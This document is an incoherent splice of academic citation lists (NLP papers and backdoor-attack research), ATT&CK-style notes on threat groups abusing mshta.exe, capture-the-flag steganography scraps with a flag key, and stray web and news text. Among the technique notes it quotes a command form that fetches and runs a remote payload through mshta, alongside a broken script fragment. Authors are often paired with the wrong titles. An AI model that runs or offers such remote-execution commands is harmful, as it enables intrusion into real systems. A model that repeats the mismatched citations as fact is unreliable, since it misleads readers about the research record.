[pdf] Yilun Zhu, Sameer Pradhan and Amir Zeldes, An Improved Model for Voicing Silent Speech Zechuan Hu, Yong Jiang, Nguyen Bach, Tao Wang, Zhongqiang Huang, Fei Huang and Kewei Tu, Exploring Distantly-Labeled Rationales in Neural Network Models arXiv, 2020. [29], During Operation Dust Storm, the threat actors executed JavaScript code via mshta.exe. [pdf] Zhipeng Xie and Nan Zeng, Attention Flows are Shapley Value Explanations Yufei Wang, Ian Wood, Stephen Wan, Mark Dras and Mark Johnson, Guiding the Growth: Difficulty-Controllable Question Generation through Step-by-Step Rewriting Iman Deznabi, Mohit Iyyer and Madalina Fiterau, Sequence Models for Computational Etymology of Borrowings Kosuke Yamada, Ryohei Sasano and Koichi Takeda, A Cluster-based Approach for Improving Isotropy in Contextual Embedding Space [pdf], Toward Robustness and Privacy in Federated Learning: Experimenting with Local and Central Differential Privacy. Peru Bhardwaj, John Kelleher, Luca Costabello and Declan OSullivan, On the Effectiveness of Adapter-based Tuning for Pretrained Language Model Adaptation Yuanxin LIU, Fandong Meng, Zheng Lin, Weiping Wang and Jie Zhou, Measuring and Increasing Context Usage in Context-Aware Machine Translation Lingzhi Wang, Xingshan Zeng and Kam-Fai Wong, Dont Let Discourse Confine Your Model: Sequence Perturbations for Improved Event Language Models Sebastien Montella, Lina M. Rojas Barahona and Johannes Heinecke, Disfl-QA: A Benchmark Dataset for Understanding Disfluencies in Question Answering Zujie Liang, Huang Hu, Can Xu, Chongyang Tao, Xiubo Geng, Yining Chen, Fan Liang and Daxin Jiang, R2D2: Recursive Transformer based on Differentiable Tree for Interpretable Hierarchical Language Modeling BRONZE PRESIDENT Targets NGOs. Ryosuke Kohita, Akifumi Wachi, Daiki Kimura, Subhajit Chaudhury, Michiaki Tatsubori and Asim Munawar, MiniLMv2: Multi-Head Self-Attention Relation Distillation for Compressing Pretrained Transformers Khoa D. Doan, Yingjie Lao, Peng Yang, and Ping Li. Yinpei Dai, Hangyu Li, Yongbin Li, Jian Sun, Fei Huang, Luo Si and Xiaodan Zhu, Continual Learning for Task-oriented Dialogue System with Iterative Network Pruning, Expanding and Masking [33][34], TA551 has used mshta.exe to execute malicious payloads. [code], Certified Robustness to Label-Flipping Attacks via Randomized Smoothing. I will restart the update as soon as possible. Chenyao Liu, Shengnan An, Zeqi Lin, Qian Liu, Bei Chen, Jian-Guang Lou, Lijie Wen, Nanning Zheng and Dongmei Zhang, Out of Order: How important is the sequential order of words in a sentence in Natural Language Understanding tasks? [code], Turn the Combination Lock: Learnable Textual Backdoor Attacks via Word Substitution. [pdf] Luyang Kong, Christopher Winestock and Parminder Bhatia, Stylized Story Generation with Style-Guided Planning [pdf], Exploring the Universal Vulnerability of Prompt-based Learning Paradigm. [link], Use Procedural Noise to Achieve Backdoor Attack. Huiying Li, Arjun Nitin Bhagoji, Ben Y. Zhao, and Haitao Zheng. FIN7 Evolution and the Phishing LNK. Weizhou Shen, Siyue Wu, Yunyi Yang and Xiaojun Quan, Knowledge-Enriched Event Causality Identification via Latent Structure Induction Networks Reinforcement Learning, ImpNet: Imperceptible and blackbox-undetectable backdoors in compiled neural networks, Shielding Federated Learning: Mitigating Byzantine Attacks with Less Constraints, Backdoor Attacks in the Supply Chain of Masked Image Modeling, Invariant Aggregator for Defending Federated Backdoor Attacks. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. Tongtong Liu, Fangxiang Feng and Xiaojie WANG, When Do You Need Billions of Words of Pretraining Data? Junyu Lin, Lei Xu, Yingqi Liu, Xiangyu Zhang. Oleg Vasilyev and John Bohannon, Assessing Dialogue Systems with Distribution Distances @:s-, ex91;utF$jAQDfoZ. Mingjie Sun, Siddhant Agarwal, and J. Zico Kolter. Mingfu Xue, Can He, Yinghao Wu, Shichang Sun, Yushu Zhang, Jian Wang, and Weiqiang Liu. Abhilasha Ravichander, Alan W Black, Thomas Norton, Shomir Wilson and Norman Sadeh, HiddenCut: Simple Data Augmentation for Natural Language Understanding with Better Generalizability Cong Liao, Haoti Zhong, Anna Squicciarini, Sencun Zhu, and David Miller. Han Wu, Kun Xu, Linfeng Song, Lifeng Jin, Haisong Zhang and Linqi Song, Zero-shot Fact Verification by Claim Generation [9], APT32 has used mshta.exe for code execution. Ashish Shrivastava, Kaustubh Dhole, Abhinav Bhatt and Sharvani Raghunath, An Empirical Study on Adversarial Attack on NMT: Languages and Positions Matter Silin Gao, Ryuichi Takanobu, Wei Peng, Qun Liu and Minlie Huang, Target-oriented Fine-tuning for Zero-Resource Named Entity Recognition Elizabeth Nielsen, Mark Steedman and Sharon Goldwater, End-to-End Training of Neural Retrievers for Open-Domain Question Answering [code], Backdoor Attacks on Crowd Counting. Chenglei Si, Zhengyan Zhang, Fanchao Qi, Zhiyuan Liu, Yasheng Wang, Qun Liu and Maosong Sun, Fusing Label Embedding into BERT: An Efficient Improvement for Text Classification WeiGuo, Benedetta Tondi, and Mauro Barni. Xiao Pan, Mingxuan Wang, Liwei Wu and Lei Li, A Semantic-based Method for Unsupervised Commonsense Question Answering [pdf], Disabling Backdoor and Identifying Poison Data by using Knowledge Distillation in Backdoor Attacks on Deep Neural Networks. [pdf] Xuelin Situ, Ingrid Zukerman, Cecile Paris, Sameen Maruf and Gholamreza Haffari, StereoSet: Measuring stereotypical bias in pretrained language models [link], Backdoor Attacks-resilient Aggregation based on Robust Filtering of Outliers in Federated Learning for Image Classification. Belinda Z. Li, Maxwell Nye and Jacob Andreas, Personalized Transformer for Explainable Recommendation [pdf], Backdoor Attack through Frequency Domain. RopSteg: Program Steganography with Return Oriented Programming, Jekyll on iOS: When Benign Apps Become Evil. Anna Rogers, Cross-replication Reliability - An Empirical Approach to Interpreting Inter-rater Reliability Li Huang, Junjie Li, Weiwei Jiang, Zhiyu Zhang, Minchuan Chen, Shaojun Wang and Jing Xiao, Learning to Perturb Word Embeddings for Out-of-distribution QA Department of Computer Science & Engineering There was a problem preparing your codespace, please try again. Yunfei Liu, Xingjun Ma, James Bailey, and Feng Lu. arXiv, 2020. Chengyu Song, Byoungyoung Lee, Kangjie Lu, William R. Harris, Taesoo Kim, and Wenke Lee. [pdf], Backdoor Attack with Imperceptible Input and Latent Modification. [pdf], BaFFLe: Backdoor detection via Feedback-based Federated Learning. Bingxu Mu, Le Wang, and Zhenxing Niu. [pdf], Constrained Optimization with Dynamic Bound-scaling for Effective NLPBackdoor Defense. [code], Backdoor Attacks Against Deep Learning Systems in the Physical World. Jinbae Im, Moonki Kim, Hoyeop Lee, Hyunsouk Cho and Sehee Chung, Which Linguist Invented the Lightbulb? (2019, August 12). (2022). [previous version] Yu Lu, Jiali Zeng, Jiajun Zhang, Shuangzhi Wu and Mu Li, Analyzing the Source and Target Contributions to Predictions in Neural Machine Translation Haoyue Shi, Karen Livescu and Kevin Gimpel, Towards Protecting Vital Healthcare Programs by Extracting Actionable Knowledge from Policy Yun Hu, Yeshuang Zhu, Jinchao Zhang, Changwen Zheng and Jie Zhou, Discriminative Reasoning for Document-level Relation Extraction Clara Vania, Phu Mon Htut, William Huang, Dhara Mungra, Richard Yuanzhe Pang, Jason Phang, Haokun Liu, Kyunghyun Cho and Samuel R. Bowman, A Pre-training Strategy for Zero-Resource Response Selection in Knowledge-Grounded Conversations arXiv, 2021. SICHENG YU, Hao Zhang, Yulei Niu, Qianru Sun and Jing Jiang, A Knowledge-Guided Framework for Frame Identification [pdf] Jonathan Hayase, Weihao Kong, Raghav Somani, and Sewoong Oh. [pdf] defense techniques are sharp and generic. arXiv, 2022. arXiv, 2021. Jiazhu Dai, Chuanshuai Chen, and Yufeng Li. Yiming Li, Ziqi Zhang, Jiawang Bai, Baoyuan Wu, Yong Jiang, and Shu-Tao Xia. Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. Ashkan Kazemi, Kiran Garimella, Devin Gaffney and Scott Hale, A Large-Scale Chinese Multimodal NER Dataset with Speech Clues [pdf] [code], Narcissus: A Practical Clean-Label Backdoor Attack with Limited Information. arXiv, 2022. Goshawk: Hunting Memory Corruptions via Structure-Aware and Object-Centric Memory Operation Synopsis. [code], Don't Trigger Me! Tommaso Fornaciari, Dirk Hovy, Elin Naurin, Julia Runeson, Robert Thomson and Pankaj Adhikari, WeaQA: Weak Supervision via Captions for Visual Question Answering [pdf] Sanghyun Hong, Varun Chandrasekaran, Yiitcan Kaya, Tudor Dumitra, and Nicolas Papernot. Lang Yu and Allyson Ettinger, Lifelong Learning of Topics and Domain-Specific Word Embeddings Shuo Wang, Surya Nepal, Carsten Rudolph, Marthie Grobler, Shangyu Chen, and Tianle Chen. arXiv, 2022. Yue Wang, Esha Sarkar, Michail Maniatakos, and Saif Eddin Jabari. Bo Zheng, Li Dong, Shaohan Huang, Wenhui Wang, Zewen Chi, Saksham Singhal, Wanxiang Che, Ting Liu, Xia Song and Furu Wei, Improving Document Representations by Generating Pseudo Query Embeddings for Dense Retrieval Oyvind Tafjord, Bhavana Dalvi and Peter Clark, Probing Image-Language Transformers for Verb Understanding Zhenyu Zhang, Bowen Yu, Xiaobo Shu, Xue Mengge, Tingwen Liu and Li Guo, SyGNS: A Systematic Generalization Testbed Based on Natural Language Semantics [pdf] SideCopy APT: Connecting lures victims, payloads to infrastructure. Austin Blodgett and Nathan Schneider, Meta-Learning to Compositionally Generalize [pdf], DeepSight: Mitigating Backdoor Attacks in Federated Learning Through Deep Model Inspection. (2020, April 20). Weixin Liang, Kai-Hui Liang and Zhou Yu, How is BERT surprised? (2021, March 4). Muhammad Abdul-Mageed, AbdelRahim Elmadany and El Moatez Billah Nagoudi, Glancing Transformer for Non-Autoregressive Neural Machine Translation Xin Zheng, Zhirui Zhang, Junliang Guo, Shujian Huang, Boxing Chen, Weihua Luo and Jiajun CHEN, VAULT: VAriable Unified Long Text Representation for Machine Reading Comprehension Sanghyun Hong, Nicholas Carlini, and Alexey Kurakin. [pdf], Dynamic backdoor attacks against federated learning. arXiv, 2020. Chuan Guo, Ruihan Wu, and Kilian Q. Weinberger. Bao Gia Doan, Ehsan Abbasnejad, and Damith C. Ranasinghe. Eva Maria Vecchi, Neele Falk, Iman Jundi and Gabriella Lapesa, What Ingredients Make for an Effective Crowdsourcing Protocol for Difficult NLU Data Collection Tasks? [pdf], Clean-Annotation Backdoor Attack against Lane Detection Systems in the Wild. Yein Kim, Huili Chen, and Farinaz Koushanfar. arXiv, 2021. By the way, the key is H0wt0Pr1ntAWh17e5p4ceC0de. Note: In the same year, please place the conference paper before the journal paper, as journals are usually submitted a long time ago and therefore have some lag. Wei-Ning Hsu, David Harwath, Tyler Miller, Christopher Song and James Glass, Directed Acyclic Graph Network for Conversational Emotion Recognition Bo-Hsiang Tseng, Yinpei Dai, Florian Kreyssig and Bill Byrne, PASS: Perturb-and-Select Summarizer for Product Reviews Murtadha Ahmed, Qun Chen, Yanyan Wang, Youcef Nafa, Zhanhuai Li and Tianyi Duan, OutFlip: Generating Examples for Unknown Intent Detection with Natural Language Attack Tong Zhang, Long Zhang, Wei Ye, Bo Li, Jinan Sun, Xiaoyu Zhu, Wen Zhao and Shikun Zhang, VECO: Variable and Flexible Cross-lingual Pre-training for Language Understanding and Generation Soheil Kolouri, Aniruddha Saha, Hamed Pirsiavash, and Heiko Hoffmann. Xuefeng Bai, Yulong Chen, Linfeng Song and Yue Zhang, Selective Knowledge Distillation for Neural Machine Translation Wenkai Yang, Yankai Lin, Peng Li, Jie Zhou, and Xu Sun. Wei Guo, Benedetta Tondi, and Mauro Barni. Benjamin Minixhofer, Milan Gritta and Ignacio Iacobacci, Empirical Error Modeling Improves Robustness of Noisy Neural Sequence Labeling Francesca Vera, Relation Classification with Entity Type Restriction Yuqi Ren and Deyi Xiong, Distributed Representations of Emotion Categories in Emotion Space arXiv, 2020. [pdf], LIRA: Learnable, Imperceptible and Robust Backdoor Attacks. Reena Zelenkova, Jack Swallow, M. A. P. Chamikara, Dongxi Liu, Mohan Baruwal Chhetri, Seyit Camtepe, Marthie Grobler, and Mahathir Almashor. Jiacheng Li, Haibo Ding, Jingbo Shang, Julian McAuley and Zhe Feng, Intrinsic Bias Metrics Do Not Correlate with Application Bias Baoyuan Wu, Hongrui Chen, Mingda Zhang, Zihao Zhu, Shaokui Wei, Danni Yuan, Chao Shen, and Hongyuan Zha. arXiv, 2021. Xichen Shang, Qianli Ma, Zhenxi Lin, Jiangyue Yan and Zipeng Chen, X-Fact: A New Benchmark Dataset for Multilingual Fact Checking Fenglin Liu, Shen Ge and Xian Wu, Locate and Label: A Two-stage Identifier for Nested Named Entity Recognition Yuchen Li and Andrej Risteski, Dynamic Contextualized Word Embeddings Kunzhe Huang, Yiming Li, Baoyuan Wu, Zhan Qin, and Kui Ren. [pdf] Jhih-wei Chen, Tsu-Jui Fu, Chen-Kang Lee and Wei-Yun Ma, GEM: A General Evaluation Benchmark for Multimodal Tasks We will try our best to continuously maintain this Github Repository in a daily or weekly manner. Paul Rttger, Bertie Vidgen, Dong Nguyen, Zeerak Waseem, Helen Margetts and Janet Pierrehumbert, Robustifying Multi-hop QA through Pseudo-Evidentiality Training Computer Security (EthiCS 2023), co-located with NDSS'23. [code], BadRes: Reveal the Backdoors through Residual Connection. Shakti Kumar, Jithin Pradeep and Hussain Zaidi, How to Split: the Effect of Word Segmentation on Gender Bias in Speech Translation Haripriya Harikumar, Vuong Le, Santu Rana, Sourangshu Bhattacharya, Sunil Gupta, and Svetha Venkatesh. [pdf], Dynamic Backdoor Attacks with Global Average Pooling Nghia Ngo Trung, Duy Phung and Thien Huu Nguyen, Learning Contextualized Knowledge Structures for Commonsense Reasoning Yao Qiu, Jinchao Zhang and Jie Zhou, Multi-Granularity Contrasting for Cross-Lingual Pre-Training Ziqi Wang, Xiaozhi Wang, Xu Han, Yankai Lin, Lei Hou, Zhiyuan Liu, Peng Li, Juanzi Li and Jie Zhou, TWAG: A Topic-Guided Wikipedia Abstract Generator Xiangyu Qi, Tinghao Xie, Saeed Mahloujifar, and Prateek Mittal. Yikang Shen, Yi Tay, Che Zheng, Dara Bahri, Donald Metzler and Aaron Courville, Convolutions and Self-Attention: Re-interpreting Relative Positions in Pre-trained Language Models [pdf] [17], Kimsuky has used mshta.exe to run malicious scripts on the system. Adithya Renduchintala, Denise Diaz, Kenneth Heafield, Xian Li and Mona Diab, Enforcing Consistency in Weakly Supervised Semantic Parsing Nanzi Yang, Wenbo Shen, Jinku Li, Yutian Yang, Kangjie Lu, Jietao Xiao, Tianyu Zhou, Chenggang Qin, Wang Yu, Jianfeng Ma, and Kui Ren. A Qualitative Analysis into Bag-level Relation Extraction This Friday, were taking a look at Microsoft and Sonys increasingly bitter feud over Call of Duty and whether U.K. regulators are leaning toward torpedoing the Activision Blizzard deal. Steghide is a command-line tool that allows you to Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Shangwei Guo, Chunlong Xie, Jiwei Li, Lingjuan Lyu, and Tianwei Zhang. arXiv, 2022. [code], Provable Defense against Backdoor Policies in Reinforcement Learning. Zeyu Dai and Ruihong Huang, Representing Syntax and Composition with Geometric Transformations [1], POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts. Devaraja Adiga, Rishabh Kumar, Amrith Krishna, Preethi Jyothi, Ganesh Ramakrishnan and Pawan Goyal, DialogSum: A Real-Life Scenario Dialogue Summarization Dataset [pdf], Backdoor Attacks on Network Certification via Data Poisoning. (It Is Reverse Flag), 010k.jpg Stegsolve, 0o @ a flag, key010keyjpgkey.txt, , basekey.jpgexif basebasecrack base58664-6=58. [26], Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server. Pei Ke, Haozhe Ji, Yu Ran, Xin Cui, Liwei Wang, Linfeng Song, Xiaoyan Zhu and Minlie Huang, OKGIT: Open Knowledge Graph Link Prediction with Implicit Types [code], CLEANN: Accelerated Trojan Shield for Embedded Neural Networks. [pdf], AEVA: Black-box Backdoor Detection Using Adversarial Extreme Value Analysis. [code], Trembling Triggers: Exploring the Sensitivity of Backdoors in DNN-based Face Recognition. [link], Anti-Distillation Backdoor Attacks: Backdoors Can Really Survive in Knowledge Distillation. [pdf], Defending Backdoor Attacks on Vision Transformer via Patch Processing. Antonio Martnez-Garca, Toni Badia and Jeremy Barnes, Improving Dialog Systems for Negotiation with Personality Modeling [code], Mitigating Data Poisoning in Text Classification with Differential Privacy. Anthony Chen, Pallavi Gudipati, Shayne Longpre, Xiao Ling and Sameer Singh, QASR: QCRI Aljazeera Speech Resource A Large Scale Annotated Arabic Speech Corpus Emily Wenger, Roma Bhattacharjee, Arjun Nitin Bhagoji, Josephine Passananti, Emilio Andere, Haitao Zheng, and Ben Y. Zhao. Xueqing Liu and Chi Wang, Keep It Simple: Unsupervised Simplification of Multi-Paragraph Text [link], Simtrojan: Stealthy Backdoor Attack. Yichi Zhang and Joyce Chai, Marked Attribute Bias in Natural Language Inference Yu Bai, Yang Gao and Heyan Huang, Rewriter-Evaluator Architecture for Neural Machine Translation Kun Yan, Lei Ji, Huaishao Luo, Ming Zhou, Nan Duan and Shuai Ma, Super Tickets in Pre-Trained Language Models: From Model Compression to Improving Generalization Qiaoyang Luo, Lingqiao Liu, Yuhao Lin and Wei Zhang, Detecting Harmful Memes and Their Targets ]sct"")")), They may also be executed directly from URLs: mshta http[:]//webserver/payload[. Tobias Lorenz, Marta Kwiatkowska, and Mario Fritz. Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Steghide is a command-line tool that allows you to Danni Liu, Jan Niehues, James Cross, Francisco Guzmn and Xian Li, Diversifying Dialog Generation via Adaptive Label Smoothing [pdf], Defending Label Inference and Backdoor Attacks in Vertical Federated Learning. [pdf], Watermarking Pre-trained Encoders in Contrastive Learning. [30], Sibot has been executed via MSHTA application. Jie Lei, Tamara Berg and Mohit Bansal, Reinforcement Learning for Abstractive Question Summarization with Question-aware Semantic Rewards Ziyun Wang, Xuan Liu, Peiji Yang, Shixing Liu and Zhisheng Wang, Preview, Attend and Review: Schema-Aware Curriculum Learning for Multi-Domain Dialogue State Tracking Shuo Wang, Zhaopeng Tu, Zhixing Tan, Shuming Shi, Maosong Sun and Yang Liu, Named Entity Recognition via Noise Aware Training Mechanism with Data Filter [pdf], Defense Against Multi-target Trojan Attacks. Alvin Chan, Yi Tay, Yew-Soon Ong, and Aston Zhang. [pdf], Backdoor Defense via Decoupling the Training Process. Ananth Balashankar and Lakshminarayanan Subramanian, The Art of Abstention: Selective Prediction and Error Regularization for Natural Language Processing EMS: History-Driven Mutation for Coverage-based Fuzzing. Hui Liu and Xiaojun Wan, Entity Enhancement for Implicit Discourse Relation Classification in the Biomedical Domain [pdf], Learning to Detect Malicious Clients for Robust Federated Learning. Muhammad Bilal Zafar, Michele Donini, Dylan Slack, Cedric Archambeau, Sanjiv Das and Krishnaram Kenthapadi, Multimodal Graph-based Transformer Framework for Biomedical Relation Extraction arXiv, 2022. In this article, we will be using the steghide tool to hide data in an image file. Siddhant Garg, Adarsh Kumar, Vibhor Goel, and Yingyu Liang. You signed in with another tab or window. Starting from the pretrained multimodal representation model CLIP released by OpenAI, we switched its text encoder with a pretrained multilingual text encoder XLM-R, and aligned both languages and image representations by a two-stage training Wonseok Hwang, Jinyeong Yim, Seunghyun Park, Sohee Yang and Minjoon Seo, Entity-Aware Abstractive Multi-Document Summarization arXiv, 2022. Phillip Rieger, Thien Duc Nguyen, Markus Miettinen, and Ahmad-Reza Sadeghi. Presupposition Verification for Question-Answering Hai Wan, Jinxia Lin, Jianfeng Du, Dawei Shen and Manrong Zhang, Evaluating Word Embeddings with Categorical Modularity Vijit Malik, Rishabh Sanjay, Shubham Kumar Nigam, Kripabandhu Ghosh, Shouvik Kumar Guha, Arnab Bhattacharya and Ashutosh Modi, Common Sense Beyond English: Evaluating and Improving Multilingual Language Models for Commonsense Reasoning Tharindu Ranasinghe, Constantin Orasan and Ruslan Mitkov, Towards more equitable question answering systems: How much more data do you need? Tao Qi, Fangzhao Wu, Chuhan Wu and Yongfeng Huang, Ultra-Fine Entity Typing with Weak Supervision from a Masked Language Model [code], Neural Network Surgery: Injecting Data Patterns into Pre-trained Models with Minimal Instance-wise Side Effects. arXiv, 2020. Thai Le, Noseong Park and Dongwon Lee, Cross-Lingual Abstractive Summarization with Limited Parallel Resources Jiaman Wu, Dezhi Hong, Rajesh Gupta and Jingbo Shang, Medical Code Assignment with Gated Convolution and Note-Code Interaction [pdf], Transferable Graph Backdoor Attack. [link], PTB: Robust Physical Backdoor Attacks against Deep Neural Networks in Real World. Yunbin Tu, Tingting Yao, Liang Li, Jiedong Lou, Shengxiang Gao, Zhengtao Yu and Chenggang Yan, The Authors Matter: Understanding and Mitigating Implicit Bias in Deep Text Classification Le Feng, Sheng Li, Zhenxing Qian, and Xinpeng Zhang. Jaap Jumelet, Milica Denic, Jakub Szymanik, Dieuwke Hupkes and Shane Steinert-Threlkeld, Slot Transferability for Cross-domain Slot Filling Ruiqing Zhang, Chao Pang, Chuanqiang Zhang, Shuohuan Wang, Zhongjun He, Yu Sun, Hua Wu and Haifeng Wang, Multi-Lingual Question Generation with Language Agnostic Language Model Richard Antonello, Nicole Beckage, Javier Turek and Alexander Huth, BERT is to NLP what AlexNet is to CV: Can Pre-Trained Language Models Identify Analogies? [pdf], Confidence Matters: Inspecting Backdoors in Deep Neural Networks via Distribution Transfer. [pdf], Sleeper Agent: Scalable Hidden Trigger Backdoors for Neural Networks Trained from Scratch. Valentin Hofmann, Janet Pierrehumbert and Hinrich Schtze, Superbizarre Is Not Superb: Derivational Morphology Improves BERTs Interpretation of Complex Words [link], BDDR: An Effective Defense Against Textual Backdoor Attacks. Yun Tang, Juan Pino, Xian Li, Changhan Wang and Dmitriy Genzel, On the Efficacy of Adversarial Data Collection for Question Answering: Results from a Large-Scale Randomized Study Steganography Software Packing North Koreas Lazarus APT leverages Windows Update client, GitHub in latest campaign. Xinqiao Zhang, Huili Chen, and Farinaz Koushanfar. Shawn Shan, Emily Wenger, Bolun Wang, Bo Li, Haitao Zheng, Ben Y. Zhao. Jean-Stanislas Denain and Jacob Steinhardt. Nedjma Ousidhoum, Xinran Zhao, Tianqing Fang, Yangqiu Song and Dit-Yan Yeung, Align Voting Behavior with Public Statements for Legislator Representation Learning Shiwei Lu, Ruihu Li, Wenbin Liu, and Xuan Chen. [pdf], What Do Deep Nets Learn? Bowen Wang*, Kangjie Lu*, Qiushi Wu, and Aditya Pakki. Jinyin Chen, Xueke Wang, Yan Zhang, Haibin Zheng, Shanqing Yu, and Liang Bao. Lunghi, D and Horejsi, J. Ana-Maria Bucur, Marcos Zampieri and Liviu P. Dinu, Do Language Models Perform Generalizable Commonsense Inference? Keyang Xu, Tongzheng Ren, Shikun Zhang, Yihao Feng and Caiming Xiong, Learning to Ask Conversational Questions by Optimizing Levenshtein Distance Meng Xu, Kangjie Lu, Taesoo Kim, and Wenke Lee. Miguel Villarreal-Vasquez, and Bharat Bhargava. [pdf], Bias Busters: Robustifying DL-based Lithographic Hotspot Detectors Against Backdooring Attacks. Xi Xiangyu, Wei Ye, Shikun Zhang, Quanxiu Wang, Huixing Jiang and Wei Wu, Parameter-Efficient Transfer Learning with Diff Pruning Runzhe Zhan, Xuebo Liu, Derek F. Wong and Lidia S. Chao, A Span-based Dynamic Local Attention Model for Sequential Sentence Classification Jeremy Barnes, Robin Kurtz, Stephan Oepen, Lilja vrelid and Erik Velldal, A Survey of Race, Racism, and Anti-Racism in NLP Aditya Gupta, Jiacheng Xu, Shyam Upadhyay, Diyi Yang and Manaal Faruqui, Does Robustness Improve Fairness? [pdf] [pdf], Backdoor Attacks on Self-Supervised Learning. A command-line tool for whitespace steganography (see above). Jun Yan, Nasser Zalmout, Yan Liang, Christan Grant, Xiang Ren and Xin Luna Dong, Better than Average: Paired Evaluation of NLP systems Alexandra Ils, Dan Liu, Daniela Grunow and Steffen Eger, SENT: Sentence-level Distant Relation Extraction via Negative Training Implicit Causality Bias and Its Interaction with Explicit Cues in LMs Dimitris Pappas and Ion Androutsopoulos, Cascaded Head-colliding Attention Liwei Wu, Shanbo Cheng, Mingxuan Wang and Lei Li, Retrieval Enhanced Model for Commonsense Generation Ramy Eskander, Cass Lowry, Sujay Khandagale, Francesca Callejas, Judith Klavans, Maria Polinsky and Smaranda Muresan, Predicting in-hospital mortality by combining clinical notes with time-series data Jie Zhou, Yuanbin Wu, Qin Chen, Xuanjing Huang and Liang He, Improving Event Causality Identification via Self-Supervised Representation Learning on External Causal Statement Jieyu Zhao, Daniel Khashabi, Tushar Khot, Ashish Sabharwal and Kai-Wei Chang, Answer Generation for Retrieval-based Question Answering Systems [link], When Does Backdoor Attack Succeed in Image Reconstruction? [pdf], Label-Consistent Backdoor Attacks. SiYu Ding, Junyuan Shang, Shuohuan Wang, Yu Sun, Hao Tian, Hua Wu and Haifeng Wang, LeeBERT: Learned Early Exit for BERT with cross-level optimization Xinting Huang, Jianzhong Qi, Yu Sun and Rui Zhang, Probing Pre-Trained Language Models for Disease Knowledge Samson Tan, Shafiq Joty, Kathy Baxter, Araz Taeihagh, Gregory A. Bennett and Min-Yen Kan, Multi-Head Highly Parallelized LSTM Decoder for Neural Machine Translation Nada Almarwani and Mona Diab, Semantic Frame Induction using Masked Word Embeddings and Two-Step Clustering Xiaobao Wu, Chunping Li and Yishu Miao, WikiTableT: A Large-Scale Data-to-Text Dataset for Generating Wikipedia Article Sections Ayan Sengupta, Sourabh Kumar Bhattacharjee, Tanmoy Chakraborty and Md. Hua Ma, Huming Qiu, Yansong Gao, Zhi Zhang, Alsharif Abuadbba, Anmin Fu, Said Al-Sarawi, and Derek Abbott. [pdf], FRIB: Low-poisoning Rate Invisible Backdoor Attack based on Feature Repair. Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. [pdf], Text Backdoor Detection Using An Interpretable RNN Abstract Model. Wenpeng Yin, Huan Wang, Jin Qu and Caiming Xiong, Rule Augmented Unsupervised Constituency Parsing Peizhuo Lv, Hualong Ma, Jiachen Zhou, Ruigang Liang, Kai Chen, Shengzhi Zhang, and Yunfei Yang. Yuren Mao, Zekai Wang, Weiwei Liu, Xuemin Lin and Wenbin Hu, Verb Metaphor Detection via Contextual Relation Learning Biru Zhu, Yujia Qin, Ganqu Cui, Yangyi Chen, Weilin Zhao, Chong Fu, Yangdong Deng, Zhiyuan Liu, Jingang Wang, Wei Wu, Maosong Sun, and Ming Gu. [pdf], Backdoor Attacks on Federated Meta-Learning. Hongming Zhang, Haoyu Wang and Dan Roth, Incorporating Global Information in Local Attention for Knowledge Representation Learning Huy Phan, Yi Xie, Jian Liu, Yingying Chen, and Bo Yuan. Chuhan Wu, Fangzhao Wu, Tao Qi and Yongfeng Huang, Improving Compositional Generalization in Classification Tasks via Structure Annotations Research My research aims to secure widely used systems and foundational software, such as OS kernels and compilers, in a principled and practical manner---to discover new classes of vulnerabilities and threats, to detect security bugs, and to protect software systems from attacks. GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUMs layered persistence. [pdf] Khyathi Raghavi Chandu, Yonatan Bisk and Alan W Black, MLMLM: Link Prediction with Mean Likelihood Masked Language Model arXiv, 2022. David Marco Sommer, Liwei Song, Sameer Wagh, and Prateek Mittal. Xingyi Yang, Muchao Ye, Quanzeng You and Fenglong Ma, Long-Span Summarization via Local Attention and Content Selection Xin Xin, Jinlong Li and Zeqi Tan, Math Word Problem Solving with Explicit Numerical Values Shuohang Wang, Luowei Zhou, Zhe Gan, Yen-Chun Chen, Yuwei Fang, Siqi Sun, Yu Cheng and Jingjing Liu, Multi-Task Learning and Adapted Knowledge Models for Emotion-Cause Extraction Mojan Javaheripi, Mohammad Samragh, Gregory Fields, Tara Javidi, and Farinaz Koushanfar. Shulin Liu, Tao Yang, Tianchi Yue, Feng Zhang and Di Wang, Concept-Based Label Embedding via Dynamic Routing for Hierarchical Text Classification Won Ik Cho, Emmanuele Chersoni, Yu-Yin Hsu and Chu-Ren Huang, Language Tags Matter for Zero-Shot Neural Machine Translation Retrieved November 14, 2018. YUQING XIE, Yi-An Lai, Yuanjun Xiong, Yi Zhang and Stefano Soatto, Multi-TimeLine Summarization (MTLS): Improving Timeline Summarization by Generating Multiple Summaries Retrieved December 27, 2018. , StackHeap Chien-Sheng Wu, Linqing Liu, Wenhao Liu, Pontus Stenetorp and Caiming Xiong, Elaborative Simplification: Content Addition and Explanation Generation in Text Simplification Yan Zhang, Ruidan He, ZUOZHU LIU, Lidong Bing and Haizhou Li, Neural Bi-Lexicalized PCFG Induction [link], Invisible and Efficient Backdoor Attacks for Compressed Deep Neural Networks. Junyi Li, Tianyi Tang, Wayne Xin Zhao, Zhicheng Wei, Nicholas Jing Yuan and Ji-Rong Wen, NAST: A Non-Autoregressive Generator with Word Alignment for Unsupervised Text Style Transfer [pdf] Unleashing Fuzzing Through Comprehensive, Efficient, and Faithful Exploitable-Bug Exposing. Fei Li, ZhiChao Lin, Meishan Zhang and Donghong Ji, Neural Stylistic Response Generation with Disentangled Latent Variables Jieyu Lin, Jiajie Zou and Nai Ding, Modeling Task-Aware MIMO Cardinality for Efficient Multilingual Neural Machine Translation Xiang Chen, Yue Cao and Xiaojun Wan, DocOIE: A Document-level Context-Aware Dataset for OpenIE Xin Zhang, Guangwei Xu, Yueheng Sun, Meishan Zhang and Pengjun Xie, ExCAR: Event Graph Knowledge Enhanced Explainable Causal Reasoning Thai Le, Noseong Park, Dongwon Lee. Tongshuang Wu, Marco Tulio Ribeiro, Jeffrey Heer and Daniel Weld, KACE: Generating Knowledge Aware Contrastive Explanations for Natural Language Inference Rewterz. Benjamin Marie, Atsushi Fujita and Raphael Rubino, UnNatural Language Inference Ran Zmigrod, 